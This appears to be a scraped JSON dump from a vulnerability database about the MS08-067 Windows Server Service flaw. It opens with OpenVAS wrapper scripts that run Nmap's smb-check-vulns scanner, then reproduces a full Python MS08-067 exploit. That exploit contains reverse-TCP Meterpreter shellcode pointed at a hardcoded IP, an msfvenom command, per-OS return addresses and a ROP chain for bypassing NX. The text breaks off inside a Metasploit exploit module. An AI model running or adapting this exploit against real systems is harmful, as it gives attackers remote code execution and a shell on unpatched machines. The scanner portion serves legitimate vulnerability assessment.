script_tag(name:\"last_modification\", value:\"2019-04-29 07:32:42 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:01:00 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: smb-check-vulns\");\n script_category(ACT_ATTACK);\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n script_dependencies(\"nmap_nse.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap6.01\", \"Tools/Launch/nmap_nse\");\n\n script_add_preference(name:\"smbport\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign\", value:\"\", type:\"entry\");\n script_add_preference(name:\"safe\", value:\"\", type:\"entry\");\n script_add_preference(name:\"unsafe\", value:\"\", type:\"entry\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067\");\n\n script_tag(name:\"summary\", value:\"Checks for vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000\n\n - SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n\n - MS06-025, a Windows Ras RPC service vulnerability\n\n - MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system. Do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something.\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated.\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'.\nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for\nenumerating users if you turn on basic authentication.\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign\npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n - 'force': Always check server signatures, even if server says it doesn't support them (will\nprobably fail, but is technically more secure).\n\n - 'negotiate': [default] Use signatures if server supports them.\n\n - 'ignore': Never check server signatures. Not recommended.\n\n - 'disable': Don't send signatures, at all, and don't check the server's. not recommended.\nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe.\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\ni = 0;\n\nport = script_get_preference(\"smbport\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\npref = script_get_preference(\"smbport\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbport', '=', pref, '\"');\n}\npref = script_get_preference(\"randomseed\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'randomseed', '=', pref, '\"');\n}\npref = script_get_preference(\"smbbasic\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbbasic', '=', pref, '\"');\n}\npref = script_get_preference(\"smbsign\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbsign', '=', pref, '\"');\n}\npref = script_get_preference(\"safe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'safe', '=', pref, '\"');\n}\npref = script_get_preference(\"unsafe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'unsafe', '=', pref, '\"');\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port, get_host_ip());\n\nif(i > 0) {\n scriptArgs = \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv, scriptArgs);\n}\n\nif(TARGET_IS_IPV6())\n argv = make_list(argv, \"-6\");\n\ntiming_policy = get_kb_item(\"Tools/nmap/timing_policy\");\nif(timing_policy =~ '^-T[0-5]$')\n argv = make_list(argv, timing_policy);\n\nsource_iface = get_preference(\"source_iface\");\nif(source_iface =~ '^[0-9a-zA-Z:_]+$') {\n argv = make_list(argv, \"-e\");\n argv = make_list(argv, source_iface);\n}\n\nres = pread(cmd:\"nmap\", argv:argv);\n\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n', 'nmap ', argv);\n log_message(data: msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:02", "bulletinFamily": "scanner", "description": "This script attempts to check the following vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS\n\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner", "modified": "2018-10-26T00:00:00", "published": "2010-09-23T00:00:00", "id": "OPENVAS:1361412562310801287", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801287", "title": "Nmap NSE: SMB Check Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_smb_check_vulns.nasl 12115 2018-10-26 09:30:41Z cfischer $\n#\n# Wrapper for Nmap SMB Check Vulnerabilities NSE script.\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# NASL-Wrapper: Copyright (c) 2010 Greenbone Networks GmbH (http://www.greenbone.net)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801287\");\n script_version(\"$Revision: 12115 $\");\n script_cve_id(\"CVE-2006-2370\", \"CVE-2006-2371\", \"CVE-2007-1748\", \"CVE-2008-4250\", \"CVE-2009-3103\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 11:30:41 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-23 08:22:30 +0200 (Thu, 23 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Nmap NSE: SMB Check Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n script_dependencies(\"nmap_nse.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap\", \"Tools/Launch/nmap_nse\");\n\n script_add_preference(name:\"safe :\", value:\"no\", type:\"checkbox\");\n script_add_preference(name:\"unsafe :\", value:\"no\", type:\"checkbox\");\n script_add_preference(name:\"smbusername :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbpassword :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbdomain :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbport :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbtype :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbnoguest :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbhash :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed :\", value:\"\", type:\"entry\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067\");\n\n script_tag(name:\"summary\", value:\"This script attempts to check the following vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS\n\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's smb-check-vulns.nse.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nif((! get_kb_item(\"Tools/Present/nmap5.21\") &&\n ! get_kb_item(\"Tools/Present/nmap5.51\")) ||\n ! get_kb_item(\"Tools/Launch/nmap_nse\")) {\n exit(0);\n}\n\nport = script_get_preference(\"smbport :\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port, get_host_ip());\n\ni = 0;\nif( \"yes\" == script_get_preference(\"safe :\")){\n args[i++] = \"safe=1\";\n}\n\nif( \"yes\" == script_get_preference(\"unsafe :\")){\n args[i++] = \"unsafe=1\";\n}\n\nif( pref = script_get_preference(\"smbusername :\")){\n args[i++] = \"smbusername=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbpassword :\")){\n args[i++] = \"smbpassword=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbdomain :\")){\n args[i++] = \"smbdomain=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbtype :\")){\n args[i++] = \"smbtype=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbnoguest :\")){\n args[i++] = \"smbnoguest=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbhash :\")){\n args[i++] = \"smbhash=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbbasic :\")){\n args[i++] = \"smbbasic=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbsign :\")){\n args[i++] = \"smbsign=\"+pref;\n}\n\nif( pref = script_get_preference(\"randomseed :\")){\n args[i++] = \"randomseed=\"+pref;\n}\n\nif(i > 0) {\n scriptArgs = \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv, scriptArgs);\n}\n\nif(TARGET_IS_IPV6())\n argv = make_list(argv, \"-6\");\n\ntiming_policy = get_kb_item(\"Tools/nmap/timing_policy\");\nif(timing_policy =~ '^-T[0-5]$')\n argv = make_list(argv, timing_policy);\n\nsource_iface = get_preference(\"source_iface\");\nif(source_iface =~ '^[0-9a-zA-Z:_]+$') {\n argv = make_list(argv, \"-e\");\n argv = make_list(argv, source_iface);\n}\n\nres = pread(cmd:\"nmap\", argv:argv);\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n\n if (\"INFECTED\" >< result)\n set_kb_item(name:\"conficker/nse\", value:result);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n');\n log_message(data : msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-11-30T12:33:03", "bulletinFamily": "exploit", "description": "", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "EDB-ID:40279", "href": "https://www.exploit-db.com/exploits/40279", "type": "exploitdb", "title": "Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)", "sourceData": "import struct\r\nimport time\r\nimport sys\r\n\r\n\r\nfrom threading import Thread #Thread is imported incase you would like to modify\r\n\r\n\r\ntry:\r\n\r\n from impacket import smb\r\n\r\n from impacket import uuid\r\n\r\n from impacket import dcerpc\r\n\r\n from impacket.dcerpc.v5 import transport\r\n\r\n\r\nexcept ImportError, _:\r\n\r\n print 'Install the following library to make this script work'\r\n\r\n print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'\r\n\r\n print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'\r\n\r\n sys.exit(1)\r\n\r\n\r\nprint '#######################################################################'\r\n\r\nprint '# MS08-067 Exploit'\r\n\r\nprint '# This is a modified verion of Debasis Mohanty\\'s code (https://www.exploit-db.com/exploits/7132/).'\r\n\r\nprint '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'\r\n\r\nprint '#######################################################################\\n'\r\n\r\n\r\n#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40;\r\n#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)\r\n#EXITFUNC=thread Important!\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\" -f python\r\nshellcode=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode+=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode += \"\\x2b\\xc9\\x83\\xe9\\xa7\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\"\r\nshellcode += \"\\x76\\x0e\\xb7\\xdd\\x9e\\xe0\\x83\\xee\\xfc\\xe2\\xf4\\x4b\\x35\"\r\nshellcode += \"\\x1c\\xe0\\xb7\\xdd\\xfe\\x69\\x52\\xec\\x5e\\x84\\x3c\\x8d\\xae\"\r\nshellcode += \"\\x6b\\xe5\\xd1\\x15\\xb2\\xa3\\x56\\xec\\xc8\\xb8\\x6a\\xd4\\xc6\"\r\nshellcode += \"\\x86\\x22\\x32\\xdc\\xd6\\xa1\\x9c\\xcc\\x97\\x1c\\x51\\xed\\xb6\"\r\nshellcode += \"\\x1a\\x7c\\x12\\xe5\\x8a\\x15\\xb2\\xa7\\x56\\xd4\\xdc\\x3c\\x91\"\r\nshellcode += \"\\x8f\\x98\\x54\\x95\\x9f\\x31\\xe6\\x56\\xc7\\xc0\\xb6\\x0e\\x15\"\r\nshellcode += \"\\xa9\\xaf\\x3e\\xa4\\xa9\\x3c\\xe9\\x15\\xe1\\x61\\xec\\x61\\x4c\"\r\nshellcode += \"\\x76\\x12\\x93\\xe1\\x70\\xe5\\x7e\\x95\\x41\\xde\\xe3\\x18\\x8c\"\r\nshellcode += \"\\xa0\\xba\\x95\\x53\\x85\\x15\\xb8\\x93\\xdc\\x4d\\x86\\x3c\\xd1\"\r\nshellcode += \"\\xd5\\x6b\\xef\\xc1\\x9f\\x33\\x3c\\xd9\\x15\\xe1\\x67\\x54\\xda\"\r\nshellcode += \"\\xc4\\x93\\x86\\xc5\\x81\\xee\\x87\\xcf\\x1f\\x57\\x82\\xc1\\xba\"\r\nshellcode += \"\\x3c\\xcf\\x75\\x6d\\xea\\xb5\\xad\\xd2\\xb7\\xdd\\xf6\\x97\\xc4\"\r\nshellcode += \"\\xef\\xc1\\xb4\\xdf\\x91\\xe9\\xc6\\xb0\\x22\\x4b\\x58\\x27\\xdc\"\r\nshellcode += \"\\x9e\\xe0\\x9e\\x19\\xca\\xb0\\xdf\\xf4\\x1e\\x8b\\xb7\\x22\\x4b\"\r\nshellcode += \"\\x8a\\xb2\\xb5\\x5e\\x48\\xa9\\x90\\xf6\\xe2\\xb7\\xdc\\x25\\x69\"\r\nshellcode += \"\\x51\\x8d\\xce\\xb0\\xe7\\x9d\\xce\\xa0\\xe7\\xb5\\x74\\xef\\x68\"\r\nshellcode += \"\\x3d\\x61\\x35\\x20\\xb7\\x8e\\xb6\\xe0\\xb5\\x07\\x45\\xc3\\xbc\"\r\nshellcode += \"\\x61\\x35\\x32\\x1d\\xea\\xea\\x48\\x93\\x96\\x95\\x5b\\x35\\xff\"\r\nshellcode += \"\\xe0\\xb7\\xdd\\xf4\\xe0\\xdd\\xd9\\xc8\\xb7\\xdf\\xdf\\x47\\x28\"\r\nshellcode += \"\\xe8\\x22\\x4b\\x63\\x4f\\xdd\\xe0\\xd6\\x3c\\xeb\\xf4\\xa0\\xdf\"\r\nshellcode += \"\\xdd\\x8e\\xe0\\xb7\\x8b\\xf4\\xe0\\xdf\\x85\\x3a\\xb3\\x52\\x22\"\r\nshellcode += \"\\x4b\\x73\\xe4\\xb7\\x9e\\xb6\\xe4\\x8a\\xf6\\xe2\\x6e\\x15\\xc1\"\r\nshellcode += \"\\x1f\\x62\\x5e\\x66\\xe0\\xca\\xff\\xc6\\x88\\xb7\\x9d\\x9e\\xe0\"\r\nshellcode += \"\\xdd\\xdd\\xce\\x88\\xbc\\xf2\\x91\\xd0\\x48\\x08\\xc9\\x88\\xc2\"\r\nshellcode += \"\\xb3\\xd3\\x81\\x48\\x08\\xc0\\xbe\\x48\\xd1\\xba\\x09\\xc6\\x22\"\r\nshellcode += \"\\x61\\x1f\\xb6\\x1e\\xb7\\x26\\xc2\\x1a\\x5d\\x5b\\x57\\xc0\\xb4\"\r\nshellcode += \"\\xea\\xdf\\x7b\\x0b\\x5d\\x2a\\x22\\x4b\\xdc\\xb1\\xa1\\x94\\x60\"\r\nshellcode += \"\\x4c\\x3d\\xeb\\xe5\\x0c\\x9a\\x8d\\x92\\xd8\\xb7\\x9e\\xb3\\x48\"\r\nshellcode += \"\\x08\\x9e\\xe0\"\r\n\r\nnonxjmper = \"\\x08\\x04\\x02\\x00%s\"+\"A\"*4+\"%s\"+\"A\"*42+\"\\x90\"*8+\"\\xeb\\x62\"+\"A\"*10\r\ndisableNXjumper = \"\\x08\\x04\\x02\\x00%s%s%s\"+\"A\"*28+\"%s\"+\"\\xeb\\x02\"+\"\\x90\"*2+\"\\xeb\\x62\"\r\nropjumper = \"\\x00\\x08\\x01\\x00\"+\"%s\"+\"\\x10\\x01\\x04\\x01\";\r\nmodule_base = 0x6f880000\r\ndef generate_rop(rvas):\r\n\tgadget1=\"\\x90\\x5a\\x59\\xc3\"\r\n\tgadget2 = [\"\\x90\\x89\\xc7\\x83\", \"\\xc7\\x0c\\x6a\\x7f\", \"\\x59\\xf2\\xa5\\x90\"]\t\r\n\tgadget3=\"\\xcc\\x90\\xeb\\x5a\"\t\r\n\tret=struct.pack('<L', 0x00018000)\r\n\tret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)\r\n\tret+=struct.pack('<L', 0x01040110)\r\n\tret+=struct.pack('<L', 0x01010101)\r\n\tret+=struct.pack('<L', 0x01010101)\r\n\tret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)\r\n\tret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)\r\n\tret+=gadget1\r\n\tret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)\r\n\tret+=struct.pack('<L', rvas['jmp eax']+module_base)\r\n\tret+=gadget2[0]\r\n\tret+=gadget2[1]\r\n\tret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)\r\n\tret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)\r\n\tret+=gadget2[2]\r\n\tret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)\r\n\tret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)\r\n\tret+=struct.pack('<L', rvas['jmp eax']+module_base)\r\n\tret+=gadget3\t\r\n\treturn ret\r\nclass SRVSVC_Exploit(Thread):\r\n\r\n def __init__(self, target, os, port=445):\r\n\r\n super(SRVSVC_Exploit, self).__init__()\r\n\r\n self.__port = port\r\n\r\n self.target = target\r\n\tself.os\t = os\r\n\r\n\r\n def __DCEPacket(self):\r\n\tif (self.os=='1'):\r\n\t\tprint 'Windows XP SP0/SP1 Universal\\n'\r\n\t\tret = \"\\x61\\x13\\x00\\x01\"\r\n\t\tjumper = nonxjmper % (ret, ret)\r\n\telif (self.os=='2'):\r\n\t\tprint 'Windows 2000 Universal\\n'\r\n\t\tret = \"\\xb0\\x1c\\x1f\\x00\"\r\n\t\tjumper = nonxjmper % (ret, ret)\r\n\telif (self.os=='3'):\r\n\t\tprint 'Windows 2003 SP0 Universal\\n'\r\n\t\tret = \"\\x9e\\x12\\x00\\x01\" #0x01 00 12 9e\r\n\t\tjumper = nonxjmper % (ret, ret)\r\n\telif (self.os=='4'):\r\n\t\tprint 'Windows 2003 SP1 English\\n'\r\n\t\tret_dec = \"\\x8c\\x56\\x90\\x7c\" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL\r\n\t\tret_pop = \"\\xf4\\x7c\\xa2\\x7c\" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL\r\n\t\tjmp_esp = \"\\xd3\\xfe\\x86\\x7c\" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL\r\n\t\tdisable_nx = \"\\x13\\xe4\\x83\\x7c\" #0x 7c 83 e4 13 NX disable @NTDLL.DLL\r\n\t\tjumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)\r\n\telif (self.os=='5'):\r\n\t\tprint 'Windows XP SP3 French (NX)\\n'\r\n\t\tret = \"\\x07\\xf8\\x5b\\x59\" #0x59 5b f8 07 \r\n\t\tdisable_nx = \"\\xc2\\x17\\x5c\\x59\" #0x59 5c 17 c2 \r\n\t\tjumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.\r\n\telif (self.os=='6'):\r\n\t\tprint 'Windows XP SP3 English (NX)\\n'\r\n\t\tret = \"\\x07\\xf8\\x88\\x6f\" #0x6f 88 f8 07 \r\n\t\tdisable_nx = \"\\xc2\\x17\\x89\\x6f\" #0x6f 89 17 c2 \r\n\t\tjumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.\r\n\telif (self.os=='7'):\r\n\t\tprint 'Windows XP SP3 English (AlwaysOn NX)\\n'\r\n\t\trvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}\r\n\t\tjumper = generate_rop(rvasets)+\"AB\" #the nonxjmper also work in this case.\r\n\telse:\r\n\t\tprint 'Not supported OS version\\n'\r\n\t\tsys.exit(-1)\r\n\tprint '[-]Initiating connection'\r\n\r\n self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\r\n\r\n self.__trans.connect()\r\n\r\n print '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % self.target\r\n\r\n self.__dce = self.__trans.DCERPC_class(self.__trans)\r\n\r\n self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\r\n\r\n\r\n\r\n\r\n path =\"\\x5c\\x00\"+\"ABCDEFGHIJ\"*10 + shellcode +\"\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\" + \"\\x41\\x00\\x42\\x00\\x43\\x00\\x44\\x00\\x45\\x00\\x46\\x00\\x47\\x00\" + jumper + \"\\x00\" * 2\r\n\r\n server=\"\\xde\\xa4\\x98\\xc5\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x41\\x00\\x42\\x00\\x43\\x00\\x44\\x00\\x45\\x00\\x46\\x00\\x47\\x00\\x00\\x00\"\r\n prefix=\"\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\"\r\n\r\n self.__stub=server+\"\\x36\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x01\\x00\\x00\" + path +\"\\xE8\\x03\\x00\\x00\"+prefix+\"\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n return\r\n\r\n\r\n\r\n def run(self):\r\n\r\n self.__DCEPacket()\r\n\r\n self.__dce.call(0x1f, self.__stub) \r\n time.sleep(5)\r\n print 'Exploit finish\\n'\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n try:\r\n\r\n target = sys.argv[1]\r\n\t os = sys.argv[2]\r\n\r\n except IndexError:\r\n\r\n\t\t\t\tprint '\\nUsage: %s <target ip>\\n' % sys.argv[0]\r\n\r\n\t\t\t\tprint 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\\n'\r\n\t\t\t\tprint 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\\n'\r\n\r\n\t\t\t\tsys.exit(-1)\r\n\r\n\r\n\r\ncurrent = SRVSVC_Exploit(target, os)\r\n\r\ncurrent.start()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40279"}, {"lastseen": "2016-02-01T23:41:56", "bulletinFamily": "exploit", "description": "Microsoft Server Service Relative Path Stack Corruption. CVE-2008-4250. Remote exploit for windows platform", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "EDB-ID:16362", "href": "https://www.exploit-db.com/exploits/16362/", "type": "exploitdb", "title": "Microsoft Server Service Relative Path Stack Corruption", "sourceData": "##\r\n# $Id: ms08_067_netapi.rb 11614 2011-01-21 04:09:48Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Server Service Relative Path Stack Corruption',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a parsing flaw in the path canonicalization code of\r\n\t\t\t\tNetAPI32.dll through the Server Service. This module is capable of bypassing\r\n\t\t\t\tNX on some operating systems and service packs. The correct target must be\r\n\t\t\t\tused to prevent the Server Service (along with a dozen others in the same\r\n\t\t\t\tprocess) from crashing. Windows XP targets seem to handle multiple 